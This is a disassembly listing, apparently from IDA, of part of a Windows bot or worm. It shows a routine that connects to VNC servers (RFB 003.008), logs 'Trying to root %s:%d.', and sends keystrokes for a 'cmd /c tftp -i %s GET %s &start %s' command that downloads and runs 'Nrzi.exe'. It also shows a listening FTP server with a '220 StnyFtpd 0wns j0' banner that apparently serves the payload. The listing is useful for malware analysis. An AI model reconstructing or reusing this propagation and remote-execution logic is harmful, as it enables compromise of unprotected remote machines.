mov [ebp+var_24], eax
mov eax, [ebp+var_24]
mov [ebp+var_18], eax
jmp short loc_4033BA
; ---------------------------------------------------------------------------
loc_40339B: ; DATA XREF: .rdata:stru_41CAF8�o
mov eax, [ebp+arg_0]
mov [ebp+var_1C], eax
push 0
mov eax, [ebp+var_1C]
inc eax
inc eax
push eax
mov ecx, [ebp+var_20]
call sub_4034E3
mov [ebp+var_18], eax
mov eax, offset loc_4033BA
retn
; ---------------------------------------------------------------------------
loc_4033BA: ; CODE XREF: sub_40334A+4F�j
; DATA XREF: sub_40334A+6A�o
or [ebp+var_4], 0FFFFFFFFh
mov eax, [ebp+var_20]
cmp dword ptr [eax+8], 0
jbe short loc_4033F9
mov eax, [ebp+var_20]
mov eax, [eax+8]
cmp eax, [ebp+var_1C]
jbe short loc_4033DA
mov eax, [ebp+var_1C]
mov [ebp+Size], eax
jmp short loc_4033E3
; ---------------------------------------------------------------------------
loc_4033DA: ; CODE XREF: sub_40334A+86�j
mov eax, [ebp+var_20]
mov eax, [eax+8]
mov [ebp+Size], eax
loc_4033E3: ; CODE XREF: sub_40334A+8E�j
push [ebp+Size] ; Size
mov eax, [ebp+var_20]
push dword ptr [eax+4] ; Src
mov eax, [ebp+var_18]
inc eax
push eax ; Dst
call sub_402E9C
add esp, 0Ch
loc_4033F9: ; CODE XREF: sub_40334A+7B�j
mov eax, [ebp+var_20]
mov eax, [eax+8]
mov [ebp+var_14], eax
push 1
mov ecx, [ebp+var_20]
call sub_40317D
mov eax, [ebp+var_18]
inc eax
mov ecx, [ebp+var_20]
mov [ecx+4], eax
mov eax, [ebp+var_20]
push dword ptr [eax+4]
mov ecx, [ebp+var_20]
call sub_403462
and byte ptr [eax], 0
mov eax, [ebp+var_20]
mov ecx, [ebp+var_1C]
mov [eax+0Ch], ecx
mov eax, [ebp+var_14]
cmp eax, [ebp+var_1C]
jbe short loc_403440
mov eax, [ebp+var_1C]
mov [ebp+var_2C], eax
jmp short loc_403446
; ---------------------------------------------------------------------------
loc_403440: ; CODE XREF: sub_40334A+EC�j
mov eax, [ebp+var_14]
mov [ebp+var_2C], eax
loc_403446: ; CODE XREF: sub_40334A+F4�j
push [ebp+var_2C]
mov ecx, [ebp+var_20]
call sub_403018
mov ecx, [ebp+var_C]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 4
sub_40334A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403462 proc near ; CODE XREF: sub_402EB2+8D�p
; sub_402EB2+ED�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov eax, [ebp+arg_0]
dec eax
leave
retn 4
sub_403462 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __stdcall sub_403471(void *Memory, int)
sub_403471 proc near ; CODE XREF: sub_40317D+5C�p
var_4 = dword ptr -4
Memory = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
push [ebp+Memory] ; Memory
call ??3@YAXPAX@Z ; operator delete(void *)
pop ecx
leave
retn 8
sub_403471 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403485 proc near ; CODE XREF: sub_403257+1B�p
var_8 = dword ptr -8
Str = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
mov [ebp+var_8], ecx
mov eax, [ebp+var_8]
cmp dword ptr [eax+4], 0
jz short locret_4034E1
mov eax, [ebp+var_8]
push dword ptr [eax+4]
mov ecx, [ebp+var_8]
call sub_403462
movzx eax, byte ptr [eax]
test eax, eax
jz short locret_4034E1
mov eax, [ebp+var_8]
push dword ptr [eax+4]
mov ecx, [ebp+var_8]
call sub_403462
movzx eax, byte ptr [eax]
cmp eax, 0FFh
jz short locret_4034E1
mov eax, [ebp+var_8]
mov eax, [eax+4]
mov [ebp+Str], eax
push 1
mov ecx, [ebp+var_8]
call sub_40317D
push [ebp+Str] ; Str
mov ecx, [ebp+var_8]
call sub_402FF8
locret_4034E1: ; CODE XREF: sub_403485+F�j
; sub_403485+24�j ...
leave
retn
sub_403485 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4034E3 proc near ; CODE XREF: sub_40334A+41�p
; sub_40334A+62�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
push 0
push [ebp+arg_0]
call sub_403528
pop ecx
pop ecx
leave
retn 8
sub_4034E3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4034FA proc near ; CODE XREF: sub_40330B+C�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 0Ch
mov [ebp+var_8], ecx
or [ebp+var_4], 0FFFFFFFFh
cmp [ebp+var_4], 0
jbe short loc_403515
mov eax, [ebp+var_4]
mov [ebp+var_C], eax
jmp short loc_40351C
; ---------------------------------------------------------------------------
loc_403515: ; CODE XREF: sub_4034FA+11�j
mov [ebp+var_C], 1
loc_40351C: ; CODE XREF: sub_4034FA+19�j
mov eax, [ebp+var_C]
leave
retn
sub_4034FA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403521 proc near ; CODE XREF: sub_402EB2+A2�p
push ebp
mov ebp, esp
mov al, 1
pop ebp
retn
sub_403521 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403528 proc near ; CODE XREF: sub_4034E3+C�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
cmp [ebp+arg_0], 0
jge short loc_403535
and [ebp+arg_0], 0
loc_403535: ; CODE XREF: sub_403528+7�j
push [ebp+arg_0] ; unsigned int
call ??2@YAPAXI@Z ; operator new(uint)
pop ecx
pop ebp
retn
sub_403528 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403540 proc near ; CODE XREF: sub_402C60+3�p
push ebp
mov ebp, esp
movzx eax, byte_47058C
and eax, 1
test eax, eax
jnz short loc_40355D
mov al, byte_47058C
or al, 1
mov byte_47058C, al
loc_40355D: ; CODE XREF: sub_403540+F�j
pop ebp
retn
sub_403540 endp
; [00000005 BYTES: COLLAPSED FUNCTION __initp_misc_winxfltr. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_403564(int, char *Str, int)
sub_403564 proc near ; CODE XREF: .text:00403A66�p
; .text:00403A82�p ...
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = word ptr -1Ch
var_18 = word ptr -18h
var_14 = byte ptr -14h
var_C = byte ptr -0Ch
var_4 = word ptr -4
arg_0 = dword ptr 8
Str = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 28h
push esi
push edi
mov ax, word_41E9C0
mov [ebp+var_4], ax
mov ax, word_41E9C4
mov [ebp+var_18], ax
mov ax, word_4249CC
mov [ebp+var_1C], ax
mov esi, offset dword_4249D0
lea edi, [ebp+var_14]
movsd
movsb
mov esi, offset dword_4249D8
lea edi, [ebp+var_C]
movsd
movsw
cmp [ebp+arg_8], 0
jnz loc_4036BB
and [ebp+var_20], 0
jmp short loc_4035B6
; ---------------------------------------------------------------------------
loc_4035AF: ; CODE XREF: sub_403564:loc_4036B1�j
mov eax, [ebp+var_20]
inc eax
mov [ebp+var_20], eax
loc_4035B6: ; CODE XREF: sub_403564+49�j
cmp [ebp+var_20], 1
jg loc_4036B6
mov eax, [ebp+var_20]
mov [ebp+var_24], eax
cmp [ebp+var_24], 0
jz short loc_4035D7
cmp [ebp+var_24], 1
jz short loc_403645
jmp loc_4036B1
; ---------------------------------------------------------------------------
loc_4035D7: ; CODE XREF: sub_403564+66�j
push 0
push 1
lea eax, [ebp+var_4]
push eax
push [ebp+arg_0]
call dword_426470 ; send
push 0
push 1
lea eax, [ebp+var_18]
push eax
push [ebp+arg_0]
call dword_426470 ; send
push [ebp+Str] ; Str
call _strlen
pop ecx
cmp eax, 2
jnz short loc_40361A
push 0
push 4
lea eax, [ebp+var_14]
push eax
push [ebp+arg_0]
call dword_426470 ; send
jmp short loc_40362B
; ---------------------------------------------------------------------------
loc_40361A: ; CODE XREF: sub_403564+A1�j
push 0
push 5
lea eax, [ebp+var_C]
push eax
push [ebp+arg_0]
call dword_426470 ; send
loc_40362B: ; CODE XREF: sub_403564+B4�j
push 0
push [ebp+Str] ; Str
call _strlen
pop ecx
push eax
push [ebp+Str]
push [ebp+arg_0]
call dword_426470 ; send
jmp short loc_4036B1
; ---------------------------------------------------------------------------
loc_403645: ; CODE XREF: sub_403564+6C�j
push 0
push 1
lea eax, [ebp+var_4]
push eax
push [ebp+arg_0]
call dword_426470 ; send
push 0
push 1
lea eax, [ebp+var_1C]
push eax
push [ebp+arg_0]
call dword_426470 ; send
push [ebp+Str] ; Str
call _strlen
pop ecx
cmp eax, 2
jnz short loc_403688
push 0
push 4
lea eax, [ebp+var_14]
push eax
push [ebp+arg_0]
call dword_426470 ; send
jmp short loc_403699
; ---------------------------------------------------------------------------
loc_403688: ; CODE XREF: sub_403564+10F�j
push 0
push 5
lea eax, [ebp+var_C]
push eax
push [ebp+arg_0]
call dword_426470 ; send
loc_403699: ; CODE XREF: sub_403564+122�j
push 0
push [ebp+Str] ; Str
call _strlen
pop ecx
push eax
push [ebp+Str]
push [ebp+arg_0]
call dword_426470 ; send
loc_4036B1: ; CODE XREF: sub_403564+6E�j
; sub_403564+DF�j
jmp loc_4035AF
; ---------------------------------------------------------------------------
loc_4036B6: ; CODE XREF: sub_403564+56�j
jmp loc_4037AC
; ---------------------------------------------------------------------------
loc_4036BB: ; CODE XREF: sub_403564+3F�j
mov eax, [ebp+arg_8]
mov [ebp+var_28], eax
cmp [ebp+var_28], 1
jz short loc_4036D2
cmp [ebp+var_28], 2
jz short loc_403740
jmp loc_4037AC
; ---------------------------------------------------------------------------
loc_4036D2: ; CODE XREF: sub_403564+161�j
push 0
push 1
lea eax, [ebp+var_4]
push eax
push [ebp+arg_0]
call dword_426470 ; send
push 0
push 1
lea eax, [ebp+var_18]
push eax
push [ebp+arg_0]
call dword_426470 ; send
push [ebp+Str] ; Str
call _strlen
pop ecx
cmp eax, 2
jnz short loc_403715
push 0
push 4
lea eax, [ebp+var_14]
push eax
push [ebp+arg_0]
call dword_426470 ; send
jmp short loc_403726
; ---------------------------------------------------------------------------
loc_403715: ; CODE XREF: sub_403564+19C�j
push 0
push 5
lea eax, [ebp+var_C]
push eax
push [ebp+arg_0]
call dword_426470 ; send
loc_403726: ; CODE XREF: sub_403564+1AF�j
push 0
push [ebp+Str] ; Str
call _strlen
pop ecx
push eax
push [ebp+Str]
push [ebp+arg_0]
call dword_426470 ; send
jmp short loc_4037AC
; ---------------------------------------------------------------------------
loc_403740: ; CODE XREF: sub_403564+167�j
push 0
push 1
lea eax, [ebp+var_4]
push eax
push [ebp+arg_0]
call dword_426470 ; send
push 0
push 1
lea eax, [ebp+var_1C]
push eax
push [ebp+arg_0]
call dword_426470 ; send
push [ebp+Str] ; Str
call _strlen
pop ecx
cmp eax, 2
jnz short loc_403783
push 0
push 4
lea eax, [ebp+var_14]
push eax
push [ebp+arg_0]
call dword_426470 ; send
jmp short loc_403794
; ---------------------------------------------------------------------------
loc_403783: ; CODE XREF: sub_403564+20A�j
push 0
push 5
lea eax, [ebp+var_C]
push eax
push [ebp+arg_0]
call dword_426470 ; send
loc_403794: ; CODE XREF: sub_403564+21D�j
push 0
push [ebp+Str] ; Str
call _strlen
pop ecx
push eax
push [ebp+Str]
push [ebp+arg_0]
call dword_426470 ; send
loc_4037AC: ; CODE XREF: sub_403564:loc_4036B6�j
; sub_403564+169�j ...
pop edi
pop esi
leave
retn
sub_403564 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 29Ch
push esi
push edi
mov esi, offset aRfb003_008 ; "RFB 003.008\n"
lea edi, [ebp-288h]
movsd
movsd
movsd
movsb
mov esi, offset dword_41E9D8
lea edi, [ebp-0Ch]
movsw
movsb
mov esi, offset dword_4249E0
lea edi, [ebp-270h]
movsd
movsb
mov ax, word_41E9DC
mov [ebp-268h], ax
mov ax, word_41E9E0
mov [ebp-274h], ax
mov esi, offset dword_41E9E4
lea edi, [ebp-8]
movsw
movsb
mov esi, offset dword_41E9E8
lea edi, [ebp-4]
movsw
movsb
mov esi, offset dword_41E9EC
lea edi, [ebp-278h]
movsw
movsb
mov ax, word_41E9F0
mov [ebp-5Ch], ax
and dword ptr [ebp-264h], 0
and dword ptr [ebp-50h], 0
and dword ptr [ebp-60h], 0
push 0
push 1
push 2
call dword_4264A0 ; socket
mov [ebp-58h], eax
cmp dword ptr [ebp-58h], 0FFFFFFFFh
jnz short loc_403857
push dword ptr [ebp-58h]
call dword_4264B8 ; closesocket
loc_403857: ; CODE XREF: .text:0040384C�j
mov word ptr [ebp-298h], 2
lea eax, [ebp+0Ch]
push eax
call dword_426460 ; inet_addr
mov [ebp-294h], eax
push dword ptr [ebp+0A8h]
call dword_426424 ; ntohs
mov [ebp-296h], ax
push 10h
lea eax, [ebp-298h]
push eax
push dword ptr [ebp-58h]
call dword_4263D8 ; connect
test eax, eax
jz short loc_4038A9
push dword ptr [ebp-58h]
call dword_4264B8 ; closesocket
xor eax, eax
jmp loc_403C1A
; ---------------------------------------------------------------------------
loc_4038A9: ; CODE XREF: .text:00403897�j
; .text:loc_4039F5�j
push 1
pop eax
test eax, eax
jz loc_4039FA
push 40h
push 0
lea eax, [ebp-4Ch]
push eax
call _memset
add esp, 0Ch
push 0
push 40h
lea eax, [ebp-4Ch]
push eax
push dword ptr [ebp-58h]
call dword_42643C ; recv
mov [ebp-264h], eax
cmp dword ptr [ebp-264h], 0
jle short loc_4038ED
cmp dword ptr [ebp-264h], 0FFFFFFFFh
jnz short loc_4038F2
loc_4038ED: ; CODE XREF: .text:004038E2�j
jmp loc_4039FA
; ---------------------------------------------------------------------------
loc_4038F2: ; CODE XREF: .text:004038EB�j
mov eax, [ebp-50h]
mov [ebp-29Ch], eax
cmp dword ptr [ebp-29Ch], 0
jz short loc_40391F
cmp dword ptr [ebp-29Ch], 1
jz short loc_403970
cmp dword ptr [ebp-29Ch], 2
jz loc_4039BE
jmp loc_4039ED
; ---------------------------------------------------------------------------
loc_40391F: ; CODE XREF: .text:00403902�j
lea eax, [ebp-288h]
push eax
lea eax, [ebp-4Ch]
push eax
call _strcmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40395E
push 0
lea eax, [ebp-288h]
push eax
call _strlen
pop ecx
push eax
lea eax, [ebp-288h]
push eax
push dword ptr [ebp-58h]
call dword_426470 ; send
mov eax, [ebp-50h]
inc eax
mov [ebp-50h], eax
jmp short loc_40396E
; ---------------------------------------------------------------------------
loc_40395E: ; CODE XREF: .text:00403933�j
push dword ptr [ebp-58h]
call dword_4264B8 ; closesocket
xor eax, eax
jmp loc_403C1A
; ---------------------------------------------------------------------------
loc_40396E: ; CODE XREF: .text:0040395C�j
jmp short loc_4039ED
; ---------------------------------------------------------------------------
loc_403970: ; CODE XREF: .text:0040390B�j
lea eax, [ebp-0Ch]
push eax
lea eax, [ebp-4Ch]
push eax
call _strcmp
pop ecx
pop ecx
test eax, eax
jnz short loc_4039AC
push 0
lea eax, [ebp-268h]
push eax
call _strlen
pop ecx
push eax
lea eax, [ebp-268h]
push eax
push dword ptr [ebp-58h]
call dword_426470 ; send
mov eax, [ebp-50h]
inc eax
mov [ebp-50h], eax
jmp short loc_4039BC
; ---------------------------------------------------------------------------
loc_4039AC: ; CODE XREF: .text:00403981�j
push dword ptr [ebp-58h]
call dword_4264B8 ; closesocket
xor eax, eax
jmp loc_403C1A
; ---------------------------------------------------------------------------
loc_4039BC: ; CODE XREF: .text:004039AA�j
jmp short loc_4039ED
; ---------------------------------------------------------------------------
loc_4039BE: ; CODE XREF: .text:00403914�j
lea eax, [ebp-270h]
push eax
lea eax, [ebp-4Ch]
push eax
call _strcmp
pop ecx
pop ecx
test eax, eax
jnz short loc_4039DD
mov eax, [ebp-50h]
inc eax
mov [ebp-50h], eax
jmp short loc_4039ED
; ---------------------------------------------------------------------------
loc_4039DD: ; CODE XREF: .text:004039D2�j
push dword ptr [ebp-58h]
call dword_4264B8 ; closesocket
xor eax, eax
jmp loc_403C1A
; ---------------------------------------------------------------------------
loc_4039ED: ; CODE XREF: .text:0040391A�j
; .text:loc_40396E�j ...
cmp dword ptr [ebp-50h], 3
jnz short loc_4039F5
jmp short loc_4039FA
; ---------------------------------------------------------------------------
loc_4039F5: ; CODE XREF: .text:004039F1�j
jmp loc_4038A9
; ---------------------------------------------------------------------------
loc_4039FA: ; CODE XREF: .text:004038AE�j
; .text:loc_4038ED�j ...
push dword ptr [ebp+0A8h]
lea eax, [ebp+0Ch]
push eax
push offset aTryingToRootSD ; "Trying to root %s:%d."
push 200h
lea eax, [ebp-260h]
push eax
call __snprintf
add esp, 14h
push 0
push dword ptr [ebp+0B8h]
lea eax, [ebp-260h]
push eax
push offset aExp ; "#!exp!#"
push dword ptr [ebp+8]
call sub_40A08D
add esp, 14h
lea eax, [ebp-260h]
push eax
call sub_40913D
pop ecx
push 0
push 1
lea eax, [ebp-274h]
push eax
push dword ptr [ebp-58h]
call dword_426470 ; send
push 1
lea eax, [ebp-8]
push eax
push dword ptr [ebp-58h]
call sub_403564
add esp, 0Ch
push 3E8h
call ds:Sleep ; Sleep
push 0
lea eax, [ebp-5Ch]
push eax
push dword ptr [ebp-58h]
call sub_403564
add esp, 0Ch
push 3E8h
call ds:Sleep ; Sleep
push 2
lea eax, [ebp-8]
push eax
push dword ptr [ebp-58h]
call sub_403564
add esp, 0Ch
push 3E8h
call ds:Sleep ; Sleep
and dword ptr [ebp-60h], 0
jmp short loc_403ABE
; ---------------------------------------------------------------------------
loc_403AB7: ; CODE XREF: .text:00403B05�j
mov eax, [ebp-60h]
inc eax
mov [ebp-60h], eax
loc_403ABE: ; CODE XREF: .text:00403AB5�j
push offset aCmd ; "cmd"
call _strlen
pop ecx
cmp [ebp-60h], eax
jnb short loc_403B07
mov eax, [ebp-60h]
movsx eax, byte ptr aCmd[eax] ; "cmd"
push eax
push offset aC ; "%c"
push 3
lea eax, [ebp-54h]
push eax
call __snprintf
add esp, 10h
push 0
lea eax, [ebp-54h]
push eax
push dword ptr [ebp-58h]
call sub_403564
add esp, 0Ch
push 7Dh
call ds:Sleep ; Sleep
jmp short loc_403AB7
; ---------------------------------------------------------------------------
loc_403B07: ; CODE XREF: .text:00403ACC�j
push 0
lea eax, [ebp-278h]
push eax
push dword ptr [ebp-58h]
call sub_403564
add esp, 0Ch
push 7D0h
call ds:Sleep ; Sleep
push 100h
push 0
push offset byte_4248CC
call _memset
add esp, 0Ch
push offset String2 ; "Nrzi.exe"
push offset String2 ; "Nrzi.exe"
push dword ptr [ebp+8]
call sub_40892F
pop ecx
push eax
push offset aCmdCTftpISGetS ; "cmd /c tftp -i %s GET %s &start %s &exi"...
push 0FFh
push offset byte_4248CC
call __snprintf
add esp, 18h
and dword ptr [ebp-60h], 0
jmp short loc_403B72
; ---------------------------------------------------------------------------
loc_403B6B: ; CODE XREF: .text:00403BB9�j
mov eax, [ebp-60h]
inc eax
mov [ebp-60h], eax
loc_403B72: ; CODE XREF: .text:00403B69�j
push offset byte_4248CC
call _strlen
pop ecx
cmp [ebp-60h], eax
jnb short loc_403BBB
mov eax, [ebp-60h]
movsx eax, byte_4248CC[eax]
push eax
push offset aC_0 ; "%c"
push 3
lea eax, [ebp-54h]
push eax
call __snprintf
add esp, 10h
push 0
lea eax, [ebp-54h]
push eax
push dword ptr [ebp-58h]
call sub_403564
add esp, 0Ch
push 7Dh
call ds:Sleep ; Sleep
jmp short loc_403B6B
; ---------------------------------------------------------------------------
loc_403BBB: ; CODE XREF: .text:00403B80�j
push 3E8h
call ds:Sleep ; Sleep
push 0
lea eax, [ebp-278h]
push eax
push dword ptr [ebp-58h]
call sub_403564
add esp, 0Ch
and dword ptr [ebp-60h], 0
jmp short loc_403BE7
; ---------------------------------------------------------------------------
loc_403BE0: ; CODE XREF: .text:00403C0C�j
mov eax, [ebp-60h]
inc eax
mov [ebp-60h], eax
loc_403BE7: ; CODE XREF: .text:00403BDE�j
cmp dword ptr [ebp-60h], 0Dh
ja short loc_403C0E
push 1388h
call ds:Sleep ; Sleep
push 0
lea eax, [ebp-278h]
push eax
push dword ptr [ebp-58h]
call sub_403564
add esp, 0Ch
jmp short loc_403BE0
; ---------------------------------------------------------------------------
loc_403C0E: ; CODE XREF: .text:00403BEB�j
push dword ptr [ebp-58h]
call dword_4264B8 ; closesocket
push 1
pop eax
loc_403C1A: ; CODE XREF: .text:004038A4�j
; .text:00403969�j ...
pop edi
pop esi
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; DWORD __stdcall sub_403C1E(LPVOID)
sub_403C1E proc near ; DATA XREF: sub_404F31+2AF�o
var_A90 = byte ptr -0A90h
Str = byte ptr -0A78h
var_A4C = dword ptr -0A4Ch
var_A48 = dword ptr -0A48h
var_A44 = dword ptr -0A44h
argp = dword ptr -0A40h
var_A3C = dword ptr -0A3Ch
var_A38 = dword ptr -0A38h
var_A34 = byte ptr -0A34h
readfds = fd_set ptr -834h
addr = sockaddr ptr -730h
optval = byte ptr -720h
fd = dword ptr -71Ch
var_718 = dword ptr -718h
Str1 = byte ptr -714h
var_6B0 = byte ptr -6B0h
var_67C = dword ptr -67Ch
var_468 = dword ptr -468h
var_464 = byte ptr -464h
var_3E4 = dword ptr -3E4h
hostshort = word ptr -3D8h
Dest = byte ptr -3D4h
s = dword ptr -3A0h
name = sockaddr ptr -39Ch
var_38C = byte ptr -38Ch
var_328 = dword ptr -328h
addrlen = dword ptr -324h
cp = byte ptr -320h
var_310 = byte ptr -310h
var_30C = dword ptr -30Ch
WSAData = WSAData ptr -308h
var_178 = dword ptr -178h
var_174 = byte ptr -174h
Dst = byte ptr -170h
var_10C = byte ptr -10Ch
var_108 = byte ptr -108h
var_104 = dword ptr -104h
var_100 = dword ptr -100h
var_FC = dword ptr -0FCh
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0A90h
push esi
push edi
mov dword ptr [ebp+optval], 1
mov [ebp+argp], 1
mov esi, [ebp+arg_0]
mov ecx, 0A9h
lea edi, [ebp+var_67C]
rep movsd
mov eax, [ebp+arg_0]
mov [ebp+var_30C], eax
mov eax, [ebp+var_30C]
mov dword ptr [eax+2A0h], 1
and [ebp+var_104], 0
and [ebp+readfds.fd_count], 0
lea eax, [ebp+WSAData]
push eax ; lpWSAData
push 101h ; wVersionRequested
call ds:WSAStartup ; WSAStartup
mov eax, [ebp+var_468]
mov hostshort, eax
push 0 ; protocol
push 1 ; type
push 2 ; af
call ds:socket ; socket
mov [ebp+s], eax
push 4 ; optlen
lea eax, [ebp+optval]
push eax ; optval
push 4 ; optname
push 0FFFFh ; level
push [ebp+s] ; s
call ds:setsockopt ; setsockopt
lea eax, [ebp+argp]
push eax ; argp
push 8004667Eh ; cmd
push [ebp+s] ; s
call ds:ioctlsocket ; ioctlsocket
mov [ebp+name.sa_family], 2
and dword ptr [ebp+name.sa_data+2], 0
mov ax, word ptr hostshort
push eax ; hostshort
call ds:htons ; htons
mov word ptr [ebp+name.sa_data], ax
push 10h ; namelen
lea eax, [ebp+name]
push eax ; name
push [ebp+s] ; s
call ds:bind ; bind
test eax, eax
jge short loc_403D1C
push 1
pop eax
jmp loc_404492
; ---------------------------------------------------------------------------
loc_403D1C: ; CODE XREF: sub_403C1E+F4�j
push 0Ah ; backlog
push [ebp+s] ; s
call ds:listen ; listen
loc_403D2A: ; CODE XREF: sub_403C1E+184�j
and [ebp+var_A44], 0
jmp short loc_403D40
; ---------------------------------------------------------------------------
loc_403D33: ; CODE XREF: sub_403C1E:loc_403D65�j
mov eax, [ebp+var_A44]
inc eax
mov [ebp+var_A44], eax
loc_403D40: ; CODE XREF: sub_403C1E+113�j
mov eax, [ebp+var_A44]
cmp eax, [ebp+var_104]
jnb short loc_403D67
mov eax, [ebp+var_A44]
mov eax, [ebp+eax*4+var_100]
cmp eax, [ebp+s]
jnz short loc_403D65
jmp short loc_403D67
; ---------------------------------------------------------------------------
loc_403D65: ; CODE XREF: sub_403C1E+143�j
jmp short loc_403D33
; ---------------------------------------------------------------------------
loc_403D67: ; CODE XREF: sub_403C1E+12E�j
; sub_403C1E+145�j
mov eax, [ebp+var_A44]
cmp eax, [ebp+var_104]
jnz short loc_403D9E
cmp [ebp+var_104], 40h
jnb short loc_403D9E
mov eax, [ebp+var_A44]
mov ecx, [ebp+s]
mov [ebp+eax*4+var_100], ecx
mov eax, [ebp+var_104]
inc eax
mov [ebp+var_104], eax
loc_403D9E: ; CODE XREF: sub_403C1E+155�j
; sub_403C1E+15E�j
xor eax, eax
test eax, eax
jnz short loc_403D2A
mov eax, [ebp+s]
mov [ebp+var_178], eax
loc_403DB0: ; CODE XREF: sub_403C1E:loc_40448A�j
push 1
pop eax
test eax, eax
jz loc_40448F
push 41h
pop ecx
lea esi, [ebp+var_104]
lea edi, [ebp+readfds]
rep movsd
push 0 ; timeout
push 0 ; exceptfds
push 0 ; writefds
lea eax, [ebp+readfds]
push eax ; readfds
mov eax, [ebp+var_178]
inc eax
push eax ; nfds
call ds:select ; select
cmp eax, 0FFFFFFFFh
jnz short loc_403DF4
push 1
pop eax
jmp loc_404492
; ---------------------------------------------------------------------------
loc_403DF4: ; CODE XREF: sub_403C1E+1CC�j
and [ebp+fd], 0
jmp short loc_403E0A
; ---------------------------------------------------------------------------
loc_403DFD: ; CODE XREF: sub_403C1E:loc_404485�j
mov eax, [ebp+fd]
inc eax
mov [ebp+fd], eax
loc_403E0A: ; CODE XREF: sub_403C1E+1DD�j
mov eax, [ebp+fd]
cmp eax, [ebp+var_178]
jg loc_40448A
push 64h ; Size
push 0 ; Val
lea eax, [ebp+Dst]
push eax ; Dst
call _memset
add esp, 0Ch
push 64h ; Size
push 0 ; Val
lea eax, [ebp+Str1]
push eax ; Dst
call _memset
add esp, 0Ch
lea eax, [ebp+readfds]
push eax ; fd_set *
push [ebp+fd] ; fd
call __WSAFDIsSet ; __WSAFDIsSet
test eax, eax
jz loc_404485
mov eax, [ebp+fd]
cmp eax, [ebp+s]
jnz loc_403F53
mov [ebp+addrlen], 10h
lea eax, [ebp+addrlen]
push eax ; addrlen
lea eax, [ebp+addr]
push eax ; addr
push [ebp+s] ; s
call ds:accept ; accept
mov [ebp+var_A38], eax
cmp [ebp+var_A38], 0FFFFFFFFh
jz loc_403F4E
loc_403EA5: ; CODE XREF: sub_403C1E+2FF�j
and [ebp+var_A48], 0
jmp short loc_403EBB
; ---------------------------------------------------------------------------
loc_403EAE: ; CODE XREF: sub_403C1E:loc_403EE0�j
mov eax, [ebp+var_A48]
inc eax
mov [ebp+var_A48], eax
loc_403EBB: ; CODE XREF: sub_403C1E+28E�j
mov eax, [ebp+var_A48]
cmp eax, [ebp+var_104]
jnb short loc_403EE2
mov eax, [ebp+var_A48]
mov eax, [ebp+eax*4+var_100]
cmp eax, [ebp+var_A38]
jnz short loc_403EE0
jmp short loc_403EE2
; ---------------------------------------------------------------------------
loc_403EE0: ; CODE XREF: sub_403C1E+2BE�j
jmp short loc_403EAE
; ---------------------------------------------------------------------------
loc_403EE2: ; CODE XREF: sub_403C1E+2A9�j
; sub_403C1E+2C0�j
mov eax, [ebp+var_A48]
cmp eax, [ebp+var_104]
jnz short loc_403F19
cmp [ebp+var_104], 40h
jnb short loc_403F19
mov eax, [ebp+var_A48]
mov ecx, [ebp+var_A38]
mov [ebp+eax*4+var_100], ecx
mov eax, [ebp+var_104]
inc eax
mov [ebp+var_104], eax
loc_403F19: ; CODE XREF: sub_403C1E+2D0�j
; sub_403C1E+2D9�j
xor eax, eax
test eax, eax
jnz short loc_403EA5
mov eax, [ebp+var_A38]
cmp eax, [ebp+var_178]
jle short loc_403F39
mov eax, [ebp+var_A38]
mov [ebp+var_178], eax
loc_403F39: ; CODE XREF: sub_403C1E+30D�j
push 0 ; flags
push 15h ; len
push offset a220Stnyftpd0wn ; "220 StnyFtpd 0wns j0\n"
push [ebp+var_A38] ; s
call ds:send ; send
loc_403F4E: ; CODE XREF: sub_403C1E+281�j
jmp loc_404485
; ---------------------------------------------------------------------------
loc_403F53: ; CODE XREF: sub_403C1E+24A�j
push 0 ; flags
push 64h ; len
lea eax, [ebp+Dst]
push eax ; buf
push [ebp+fd] ; s
call ds:recv ; recv
mov [ebp+var_718], eax
cmp [ebp+var_718], 0
jg loc_40401A
loc_403F7D: ; CODE XREF: sub_403C1E+3E5�j
and [ebp+var_A4C], 0
jmp short loc_403F93
; ---------------------------------------------------------------------------
loc_403F86: ; CODE XREF: sub_403C1E:loc_403FFD�j
mov eax, [ebp+var_A4C]
inc eax
mov [ebp+var_A4C], eax
loc_403F93: ; CODE XREF: sub_403C1E+366�j
mov eax, [ebp+var_A4C]
cmp eax, [ebp+var_104]
jnb short loc_403FFF
mov eax, [ebp+var_A4C]
mov eax, [ebp+eax*4+var_100]
cmp eax, [ebp+fd]
jnz short loc_403FFD
loc_403FB6: ; CODE XREF: sub_403C1E+3CE�j
mov eax, [ebp+var_104]
dec eax
cmp [ebp+var_A4C], eax
jnb short loc_403FEE
mov eax, [ebp+var_A4C]
mov ecx, [ebp+var_A4C]
mov ecx, [ebp+ecx*4+var_FC]
mov [ebp+eax*4+var_100], ecx
mov eax, [ebp+var_A4C]
inc eax
mov [ebp+var_A4C], eax
jmp short loc_403FB6
; ---------------------------------------------------------------------------
